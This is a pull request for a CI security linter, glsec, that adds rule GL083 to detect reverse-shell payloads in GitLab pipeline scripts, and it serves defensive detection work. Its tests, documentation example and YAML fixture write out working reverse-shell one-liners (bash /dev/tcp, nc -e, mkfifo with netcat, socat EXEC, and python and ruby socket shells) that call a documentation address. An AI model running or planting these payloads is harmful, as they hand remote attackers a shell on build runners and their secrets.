### PR TITLE
feat(rules): add GL083 for reverse shell payloads in script

### DIFF
--- a/README.md
+++ b/README.md
@@ -254,13 +254,13 @@ Any inline `# glsec:ignore` without a `-- reason` is then reported with its file
 
 ## Rules
 
-82 rules across 8 [OWASP CI/CD security categories](https://owasp.org/www-project-top-10-ci-cd-security-risks/):
+83 rules across 8 [OWASP CI/CD security categories](https://owasp.org/www-project-top-10-ci-cd-security-risks/):
 
 | Category | OWASP | Rules |
 |----------|-------|-------|
 | Credential Hygiene | CICD-SEC-6 | GL004, GL005, GL006, GL010, GL014, GL018, GL021, GL027, GL029, GL032, GL033, GL035, GL036, GL037, GL038, GL040, GL052, GL059, GL062, GL066, GL068, GL070, GL073 |
 | Dependency & Image Pinning | CICD-SEC-3 | GL001, GL003, GL011, GL016, GL022, GL023, GL026, GL046, GL064, GL069, GL072, GL075, GL079 |
-| Component & Third-Party Integrity | CICD-SEC-4, CICD-SEC-8 | GL002, GL007, GL015, GL025, GL041, GL044, GL051, GL053, GL065, GL067, GL078 |
+| Component & Third-Party Integrity | CICD-SEC-4, CICD-SEC-8 | GL002, GL007, GL015, GL025, GL041, GL044, GL051, GL053, GL065, GL067, GL078, GL083 |
 | Supply Chain Integrity | CICD-SEC-9 | GL020, GL045 |
 | Pipeline Flow & Access Control | CICD-SEC-1, CICD-SEC-5 | GL008, GL009, GL012, GL013, GL017, GL019, GL034, GL039, GL043, GL055, GL071, GL074, GL080, GL081, GL082 |
 | Insecure Configuration | CICD-SEC-7 | GL024, GL028, GL030, GL031, GL042, GL047, GL048, GL049, GL050, GL054, GL056, GL057, GL058, GL060, GL061, GL063, GL076, GL077 |

--- a/docs/rules.md
+++ b/docs/rules.md
@@ -75,6 +75,7 @@ User-controlled inputs and unversioned component references that allow malicious
 | [GL065](rules/GL065.md) | `warn`  | `image:`/`services:` from a registry not in the opt-in `allowed_registries` allowlist |
 | [GL067](rules/GL067.md) | `warn`  | `SECURE_ANALYZERS_PREFIX` (or `*_ANALYZER_IMAGE`) repoints managed security scanners off `registry.gitlab.com` |
 | [GL078](rules/GL078.md) | `warn`  | Invisible / bidirectional Unicode control characters (Trojan Source) — rendered file can differ from what runs |
+| [GL083](rules/GL083.md) | `error` | Reverse shell or backdoor payload in `script:` — connects the runner back to an attacker-controlled host |
 
 ---
 
@@ -154,5 +155,5 @@ A subset of rules is mapped to [OWASP ASVS](https://owasp.org/www-project-applic
 | V14.3.1 — Pipeline config protected from modification | GL003, GL019 |
 | V14.3.2 — Security tools run and failures block the build | GL008, GL039, GL082 |
 | V14.3.3 — Secrets absent from source and logs | GL006, GL014, GL018, GL021, GL027, GL032, GL033, GL035, GL036, GL038, GL066, GL068 |
-| V14.3.4 — Build environment isolated | GL007, GL015, GL025 |
+| V14.3.4 — Build environment isolated | GL007, GL015, GL025, GL083 |
 | V14.4.1 — Third-party CI/CD service dependence minimised | GL041 |

--- a/docs/rules/GL011.md
+++ b/docs/rules/GL011.md
@@ -57,4 +57,6 @@ HTTPS provides transport-level security but no content integrity guarantee. If t
 
 ## See also
 
+[GL083](GL083.md) covers the other half of this problem: a script line that opens a shell back to a remote host without downloading anything.
+
 Enable the [ShellCheck integration](../../README.md#shellcheck-integration) to surface additional shell issues in these script blocks.

--- a/docs/rules/GL083.md
+++ b/docs/rules/GL083.md
@@ -1,0 +1,61 @@
+# GL083 — Reverse shell or backdoor payload in script
+
+**Severity:** `error`
+**OWASP:** [CICD-SEC-4 – Poisoned Pipeline Execution](https://owasp.org/www-project-top-10-ci-cd-security-risks/CICD-SEC-04-Poisoned-Pipeline-Execution)
+
+## What glsec checks
+
+A script line that connects the runner back to a host of the author's choosing and hands it a shell. glsec looks at every script surface: `script:`, `before_script:`, `after_script:`, `default:`, `hooks:pre_get_sources_script`, and `run:` steps.
+
+| Pattern | What has to be on the same line |
+|---------|---------------------------------|
+| Shell redirected to a socket | `/dev/tcp/` or `/dev/udp/`, plus an interactive shell (`bash -i`) or a read-write descriptor (`exec 5<>/dev/tcp/…`) |
+| Netcat with command execution | `nc`, `ncat` or `netcat` with `-e`, `-c`, or `--exec`/`--sh-exec` |
+| Named-pipe backdoor | `mkfifo` together with a netcat invocation |
+| socat with a program endpoint | `socat` together with `EXEC:` or `SYSTEM:` |
+| Interpreter socket one-liner | `python`, `perl` or `ruby` with a socket API plus `dup2`, `subprocess`, `pty.spawn` or `exec` |
+
+Every check needs a combination. Each token on its own has an ordinary use in CI, so none of them fires alone.
+
+## Why it matters
+
+The pipeline file is code that runs with the runner's full environment before anyone sees a result: `CI_JOB_TOKEN`, every masked variable the job declares, the checked-out source, and whatever the runner can reach on the network. One connect-back line inside a longer `script:` block is easy to skim past in review.
+
+[GL011](GL011.md) covers the other half of this problem, code fetched from a remote host and executed. A reverse shell fetches nothing, so GL011 never sees it.
+
+## Trigger example
+
+```yaml
+debug-job:
+  stage: test
+  image: alpine:3.19.1
+  script:
+    - bash -i >& /dev/tcp/198.51.100.7/4444 0>&1                    # error
+    - nc -e /bin/sh 198.51.100.7 4444                               # error
+    - mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 198.51.100.7 4444 > /tmp/f  # error
+    - socat TCP:198.51.100.7:4444 EXEC:/bin/bash                    # error
+```
+
+## What is not flagged
+
+These are the idioms that a looser rule would break:
+
+```yaml
+script:
+  - timeout 1 bash -c "cat < /dev/null > /dev/tcp/postgres/5432"  # wait for a service, no interactive shell
+  - nc -z postgres 5432                                           # port check, no -e/-c
+  - socat TCP-LISTEN:15432,fork TCP:postgres:5432 &               # port forward, no program endpoint
+  - mkfifo /tmp/logpipe && tail -f /tmp/logpipe                   # named pipe without netcat
+```
+
+## Notes
+
+- Quoted substrings are not stripped before matching. GL011 strips them so that a `| bash` inside a string literal stays quiet, but a reverse shell is routinely wrapped as `bash -c "bash -i >& /dev/tcp/…"`, and stripping quotes first would remove the payload.
+- A line is reported once, even when it carries more than one of the patterns above.
+- The rule reads the literal script text. A payload assembled at runtime from variables, or decoded from base64 into `sh`, is out of reach here; the base64 case is [GL011](GL011.md)'s.
+
+## See also
+
+- [GL011](GL011.md) — download-and-execute in script
+- [GL016](GL016.md) — insecure transport in script and includes
+- [GL078](GL078.md) — invisible Unicode control characters that hide what a line really is

--- a/rules/all.go
+++ b/rules/all.go
@@ -86,5 +86,6 @@ func All() []rule.Rule {
 		GL080,
 		GL081,
 		GL082,
+		GL083,
 	}
 }

--- a/rules/asvs.go
+++ b/rules/asvs.go
@@ -27,6 +27,7 @@ var asvsRequirements = map[string][]string{
 	"GL007": {"ASVS-V14.3.4"},
 	"GL008": {"ASVS-V14.3.2"},
 	"GL082": {"ASVS-V14.3.2"},
+	"GL083": {"ASVS-V14.3.4"},
 	"GL011": {"ASVS-V14.2.1"},
 	"GL014": {"ASVS-V14.3.3"},
 	"GL015": {"ASVS-V14.3.4"},

--- a/rules/cwe.go
+++ b/rules/cwe.go
@@ -84,6 +84,7 @@ var cweIDs = map[string]string{
 	"GL080": "CWE-691",
 	"GL081": "CWE-284",
 	"GL082": "CWE-693",
+	"GL083": "CWE-506",
 }
 
 // cweNames maps CWE IDs to their short names.
@@ -97,6 +98,7 @@ var cweNames = map[string]string{
 	"CWE-390":  "Detection of Error Condition Without Action",
 	"CWE-441":  "Unintended Proxy or Intermediary ('Confused Deputy')",
 	"CWE-494":  "Download of Code Without Integrity Check",
+	"CWE-506":  "Embedded Malicious Code",
 	"CWE-522":  "Insufficiently Protected Credentials",
 	"CWE-532":  "Insertion of Sensitive Information into Log File",
 	"CWE-538":  "Insertion of Sensitive Information into Externally-Accessible File or Directory",

--- a/rules/gl083.go
+++ b/rules/gl083.go
@@ -1,0 +1,97 @@
+package rules
+
+import (
+	"fmt"
+	"regexp"
+
+	"github.com/glsec/glsec/internal/finding"
+	"gopkg.in/yaml.v3"
+)
+
+type gl083 struct{}
+
+var GL083 = &gl083{}
+
+func (r *gl083) ID() string { return "GL083" }
+
+var (
+	// socketRedirRe matches a redirect to a raw TCP/UDP socket, the bash-only
+	// /dev/tcp/host/port device.
+	socketRedirRe = regexp.MustCompile(`/dev/(?:tcp|udp)/`)
+	// interactiveShellRe matches a shell invoked with the interactive flag, in
+	// any of the -i, -it, -si spellings.
+	interactiveShellRe = regexp.MustCompile(`\b(?:ba|z|k|da)?sh\b[^|;&]*\s-[a-zA-Z]*i\b`)
+	// socketExecRe matches a socket opened read-write on a file descriptor:
+	// exec 5<>/dev/tcp/host/port. The read-write form is what distinguishes it
+	// from a one-way connectivity probe.
+	socketExecRe = regexp.MustCompile(`\bexec\s+\d+<>\s*/dev/(?:tcp|udp)/`)
+
+	// netcatExecRe matches netcat asked to run a program on connect. -e and -c
+	// are the traditional and ncat spellings; both hand a shell to the peer.
+	netcatExecRe = regexp.MustCompile(`\b(?:nc|ncat|netcat)(?:\.traditional|\.openbsd)?\b[^|;&]*(?:\s-[a-zA-Z]*[ec]\b|\s--(?:exec|sh-exec|lua-exec)\b)`)
+	// netcatRe matches any netcat invocation, used only in combination with mkfifo.
+	netcatRe = regexp.MustCompile(`\b(?:nc|ncat|netcat)(?:\.traditional|\.openbsd)?\b`)
+	mkfifoRe = regexp.MustCompile(`\bmkfifo\b`)
+
+	// socatExecRe matches socat wired to a program endpoint. socat address
+	// keywords are case-insensitive.
+	socatRe     = regexp.MustCompile(`\bsocat\b`)
+	socatExecRe = regexp.MustCompile(`(?i)\b(?:exec|system):`)
+
+	// interpreterRe, socketAPIRe and interpreterExecRe together match the
+	// scripting-language one-liners: an interpreter that opens a socket and
+	// hands it to a shell.
+	interpreterRe     = regexp.MustCompile(`\b(?:python[23]?(?:\.\d+)?|perl|ruby)\b`)
+	socketAPIRe       = regexp.MustCompile(`\bsocket\.socket\b|\bTCPSocket\b|\bIO::Socket::INET\b|\bSocket::inet_aton\b|\bsocket\.AF_INET\b`)
+	interpreterExecRe = regexp.MustCompile(`\bos\.dup2\b|\bsubprocess\.(?:call|Popen|run|check_call)\b|\bpty\.spawn\b|\bexecl?\b|>&\s*S\b`)
+)
+
+// reverseShellKind returns a short description of the reverse-shell pattern in
+// line, or the empty string when the line carries none.
+//
+// Every check requires a combination. Each individual token here has ordinary
+// uses in CI: /dev/tcp is the standard wait-for-service probe, socat forwards
+// ports, nc -l is a throwaway test listener and mkfifo tees logs. It is the
+// pairing that has no innocent reading.
+//
+// Quoted substrings are deliberately not stripped the way GL011 strips them:
+// a reverse shell is routinely wrapped as bash -c "bash -i >& /dev/tcp/...",
+// and removing quotes first would remove the payload.
+func reverseShellKind(line string) string {
+	switch {
+	case socketRedirRe.MatchString(line) && (interactiveShellRe.MatchString(line) || socketExecRe.MatchString(line)):
+		return "shell redirected to a socket"
+	case netcatExecRe.MatchString(line):
+		return "netcat with command execution"
+	case mkfifoRe.MatchString(line) && netcatRe.MatchString(line):
+		return "named-pipe backdoor"
+	case socatRe.MatchString(line) && socatExecRe.MatchString(line):
+		return "socat with a program endpoint"
+	case interpreterRe.MatchString(line) && socketAPIRe.MatchString(line) && interpreterExecRe.MatchString(line):
+		return "interpreter socket one-liner"
+	}
+	return ""
+}
+
+func (r *gl083) Check(doc *yaml.Node, file string) []finding.Finding {
+	var findings []finding.Finding
+	EachScriptLine(doc, file, func(item *yaml.Node, file, job string) {
+		kind := reverseShellKind(item.Value)
+		if kind == "" {
+			return
+		}
+		findings = append(findings, finding.Finding{
+			RuleID:   "GL083",
+			Severity: finding.Error,
+			Message: fmt.Sprintf(
+				"script line opens a shell to a remote host (%s): %q — this is a reverse shell; remove it",
+				kind, truncate(item.Value, 80),
+			),
+			File: file,
+			Line: item.Line,
+			Col:  item.Column,
+			Job:  job,
+		})
+	})
+	return findings
+}

--- a/rules/gl083_test.go
+++ b/rules/gl083_test.go
@@ -1,0 +1,154 @@
+package rules
+
+import (
+	"strings"
+	"testing"
+
+	"github.com/glsec/glsec/internal/finding"
+	"github.com/glsec/glsec/internal/parser"
+)
+
+func findings083(t *testing.T, yaml string) []finding.Finding {
+	t.Helper()
+	doc, err := parser.Parse([]byte(yaml), "test.yml")
+	if err != nil {
+		t.Fatalf("parse error: %v", err)
+	}
+	return GL083.Check(doc.Root, "test.yml")
+}
+
+func TestGL083_Payloads(t *testing.T) {
+	cases := []struct {
+		name string
+		line string
+		kind string
+	}{
+		{"bash socket redirect", `bash -i >& /dev/tcp/198.51.100.7/4444 0>&1`, "shell redirected to a socket"},
+		{"sh socket redirect", `/bin/sh -i >& /dev/tcp/198.51.100.7/4444 0>&1`, "shell redirected to a socket"},
+		{"exec read-write socket", `exec 5<>/dev/tcp/198.51.100.7/4444 && cat <&5`, "shell redirected to a socket"},
+		{"udp socket redirect", `bash -i >& /dev/udp/198.51.100.7/4444 0>&1`, "shell redirected to a socket"},
+		{"quoted payload", `bash -c "bash -i >& /dev/tcp/198.51.100.7/4444 0>&1"`, "shell redirected to a socket"},
+		{"nc -e", `nc -e /bin/sh 198.51.100.7 4444`, "netcat with command execution"},
+		{"nc combined flags", `nc -nve /bin/bash 198.51.100.7 4444`, "netcat with command execution"},
+		{"ncat long flag", `ncat --sh-exec "/bin/bash" 198.51.100.7 4444`, "netcat with command execution"},
+		{"netcat.traditional", `netcat.traditional -c /bin/sh 198.51.100.7 4444`, "netcat with command execution"},
+		{"mkfifo backdoor", `mkfifo /tmp/f; cat /tmp/f | /bin/sh 2>&1 | nc 198.51.100.7 4444 > /tmp/f`, "named-pipe backdoor"},
+		{"socat exec", `socat TCP:198.51.100.7:4444 EXEC:/bin/bash`, "socat with a program endpoint"},
+		{"socat lowercase exec", `socat tcp:198.51.100.7:4444 exec:'bash -li',pty,stderr`, "socat with a program endpoint"},
+		{"socat system", `socat TCP:198.51.100.7:4444 SYSTEM:/bin/sh`, "socat with a program endpoint"},
+		{
+			"python one-liner",
+			`python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect(("198.51.100.7",4444));os.dup2(s.fileno(),0);subprocess.call(["/bin/sh"])'`,
+			"interpreter socket one-liner",
+		},
+		{"ruby one-liner", `ruby -rsocket -e 'exit if fork;c=TCPSocket.new("198.51.100.7","4444");exec "/bin/sh"'`, "interpreter socket one-liner"},
+	}
+
+	for _, tc := range cases {
+		t.Run(tc.name, func(t *testing.T) {
+			f := findings083(t, "job:\n  script:\n    - '"+strings.ReplaceAll(tc.line, "'", "''")+"'\n")
+			if len(f) != 1 {
+				t.Fatalf("expected 1 finding, got %d", len(f))
+			}
+			if f[0].Severity != finding.Error {
+				t.Errorf("expected Error severity, got %s", f[0].Severity)
+			}
+			if !strings.Contains(f[0].Message, tc.kind) {
+				t.Errorf("message %q does not name the pattern %q", f[0].Message, tc.kind)
+			}
+		})
+	}
+}
+
+func TestGL083_LegitimateIdioms(t *testing.T) {
+	cases := []struct {
+		name string
+		line string
+	}{
+		{"wait for service", `timeout 1 bash -c "cat < /dev/null > /dev/tcp/postgres/5432"`},
+		{"port check", `nc -z postgres 5432`},
+		{"nc with timeout flag", `nc -w 5 postgres 5432 < /dev/null`},
+		{"nc listener", `nc -l -p 8080 > response.txt`},
+		{"install netcat", `apk add --no-cache netcat-openbsd`},
+		{"socat port forward", `socat TCP-LISTEN:15432,fork TCP:postgres:5432`},
+		{"mkfifo for logs", `mkfifo /tmp/logpipe && tail -f /tmp/logpipe`},
+		{"plain shell", `bash -euo pipefail ./build.sh`},
+		{"interactive-looking flag", `docker run -i --rm alpine:3.19.1 sh -c "echo hi"`},
+		{"python without socket", `python3 -c "import subprocess;subprocess.call(['make'])"`},
+		{"connectivity probe", `bash -c 'echo > /dev/tcp/redis/6379' && echo up`},
+	}
+
+	for _, tc := range cases {
+		t.Run(tc.name, func(t *testing.T) {
+			f := findings083(t, "job:\n  script:\n    - '"+strings.ReplaceAll(tc.line, "'", "''")+"'\n")
+			if len(f) != 0 {
+				t.Fatalf("expected no finding for %q, got %d: %s", tc.line, len(f), f[0].Message)
+			}
+		})
+	}
+}
+
+func TestGL083_ReportsJobAndLineOnce(t *testing.T) {
+	f := findings083(t, `
+deploy:
+  before_script:
+    - socat TCP:198.51.100.7:4444 EXEC:/bin/bash
+  script:
+    - make deploy
+`)
+	if len(f) != 1 {
+		t.Fatalf("expected 1 finding, got %d", len(f))
+	}
+	if f[0].Job != "deploy" {
+		t.Errorf("expected job %q, got %q", "deploy", f[0].Job)
+	}
+	if f[0].Line != 4 {
+		t.Errorf("expected line 4, got %d", f[0].Line)
+	}
+}
+
+func TestGL083_OneFindingPerLine(t *testing.T) {
+	f := findings083(t, `
+job:
+  script:
+    - mkfifo /tmp/f; nc -e /bin/sh 198.51.100.7 4444 < /tmp/f
+`)
+	if len(f) != 1 {
+		t.Fatalf("expected 1 finding for a line matching two patterns, got %d", len(f))
+	}
+}
+
+func TestGL083_RunSteps(t *testing.T) {
+	f := findings083(t, `
+job:
+  run:
+    - name: backdoor
+      script: nc -e /bin/sh 198.51.100.7 4444
+`)
+	if len(f) != 1 {
+		t.Fatalf("expected 1 finding in a run: step, got %d", len(f))
+	}
+}
+
+func TestGL083_GlobalAndDefaultBlocks(t *testing.T) {
+	f := findings083(t, `
+before_script:
+  - socat TCP:198.51.100.7:4444 EXEC:/bin/sh
+
+default:
+  after_script:
+    - nc -e /bin/sh 198.51.100.7 4444
+
+job:
+  script:
+    - make
+`)
+	if len(f) != 2 {
+		t.Fatalf("expected 2 findings across global and default blocks, got %d", len(f))
+	}
+	for _, x := range f {
+		if x.Job != "" {
+			t.Errorf("expected empty job for a global/default block, got %q", x.Job)
+		}
+	}
+}

--- a/rules/owasp.go
+++ b/rules/owasp.go
@@ -85,6 +85,7 @@ var owaspCategories = map[string][]string{
 	"GL080": {"CICD-SEC-1"},
 	"GL081": {"CICD-SEC-5"},
 	"GL082": {"CICD-SEC-1"},
+	"GL083": {"CICD-SEC-4"},
 }
 
 // owaspCategoryNames maps OWASP CI/CD Security Risks category IDs to their names.

--- a/testdata/fixtures/gl083-reverse-shell.yml
+++ b/testdata/fixtures/gl083-reverse-shell.yml
@@ -1,0 +1,32 @@
+stages:
+  - test
+  - build
+
+debug-job:
+  stage: test
+  image: alpine:3.19.1
+  script:
+    - bash -i >& /dev/tcp/198.51.100.7/4444 0>&1
+    - nc -e /bin/sh 198.51.100.7 4444
+    - mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 198.51.100.7 4444 > /tmp/f
+    - socat TCP:198.51.100.7:4444 EXEC:/bin/bash
+    - python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect(("198.51.100.7",4444));os.dup2(s.fileno(),0);subprocess.call(["/bin/sh"])'
+
+wait-for-db:
+  stage: test
+  image: alpine:3.19.1
+  services:
+    - name: postgres:16.2
+      alias: postgres
+  script:
+    - timeout 1 bash -c "cat < /dev/null > /dev/tcp/postgres/5432"
+    - nc -z postgres 5432
+    - socat TCP-LISTEN:15432,fork TCP:postgres:5432 &
+    - psql -h postgres -c 'select 1'
+
+build:
+  stage: build
+  image: node:20.11.0
+  script:
+    - npm ci
+    - npm run build


### PR DESCRIPTION
Closes #476.

## What changed

New rule **GL083**, `error`, CICD-SEC-4 / CWE-506 / ASVS V14.3.4: a script line that connects the runner back to a remote host and hands it a shell.

Five patterns, each requiring a combination rather than a single token:

| Pattern | Required on the same script line |
|---|---|
| Shell redirected to a socket | `/dev/tcp/` or `/dev/udp/`, plus `bash -i` or a read-write descriptor (`exec 5<>/dev/tcp/…`) |
| Netcat with command execution | `nc`/`ncat`/`netcat` with `-e`, `-c`, `--exec` or `--sh-exec` |
| Named-pipe backdoor | `mkfifo` together with a netcat invocation |
| socat with a program endpoint | `socat` together with `EXEC:` or `SYSTEM:` |
| Interpreter socket one-liner | `python`/`perl`/`ruby` with a socket API plus `dup2`, `subprocess`, `pty.spawn` or `exec` |

The rule runs on `EachScriptLine`, so it covers `script:`, `before_script:`, `after_script:`, the `default:` block, `hooks:pre_get_sources_script` and `run:` steps.

The issue proposed requiring `-i` for the socket-redirect case. The implementation also accepts `exec <fd><>/dev/tcp/…`, the read-write descriptor form, which is a common spelling that carries no `-i`. It stays clear of the false-positive class below because the wait-for-service probe is always a one-way `>` or `<`, never `<>`.

## Why

GL011 covers code fetched from a remote host and executed (`curl | bash` and its variants). A reverse shell downloads nothing, so none of GL011's patterns apply, and nothing else in `rules/` looked at where a script line connects to. A pipeline containing five different reverse-shell payloads exited 0 before this change.

One deliberate difference from GL011: quoted substrings are **not** stripped before matching. GL011 strips them (`rules/gl011.go:41`) so a `| bash` inside a string literal stays quiet, but reverse shells are routinely wrapped as `bash -c "bash -i >& /dev/tcp/…"`, and stripping quotes first would throw the payload away. There is a test for the wrapped form.

## False positives

The negative cases are the point of the combination requirement, and each has a test:

```yaml
- timeout 1 bash -c "cat < /dev/null > /dev/tcp/postgres/5432"  # wait for a service
- nc -z postgres 5432                                           # port check
- nc -l -p 8080 > response.txt                                  # test listener
- apk add --no-cache netcat-openbsd                             # installing the tool
- socat TCP-LISTEN:15432,fork TCP:postgres:5432                 # port forward
- mkfifo /tmp/logpipe && tail -f /tmp/logpipe                   # named pipe for logs
- bash -euo pipefail ./build.sh                                 # ordinary shell invocation
```

Run against the full fixture corpus (83 files), GL083 fires on its own fixture and nowhere else.

## How to test

```bash
go test ./rules/ -run GL083
go test ./...                       # includes the rule-consistency test
golangci-lint run ./...
check-jsonschema --builtin-schema gitlab-ci testdata/fixtures/gl083-reverse-shell.yml

go run ./cmd/glsec --no-cache testdata/fixtures/gl083-reverse-shell.yml
```

The fixture has a `debug-job` with the five payloads (5 findings) and a `wait-for-db` job with the legitimate idioms (0 findings).

## Also in this PR

- `docs/rules/GL083.md`, the `docs/rules.md` row under *Poisoned Pipeline Execution*, the ASVS V14.3.4 mapping row, and the README count and category row.
- A pointer from `docs/rules/GL011.md` to GL083, since the two split one problem between them.
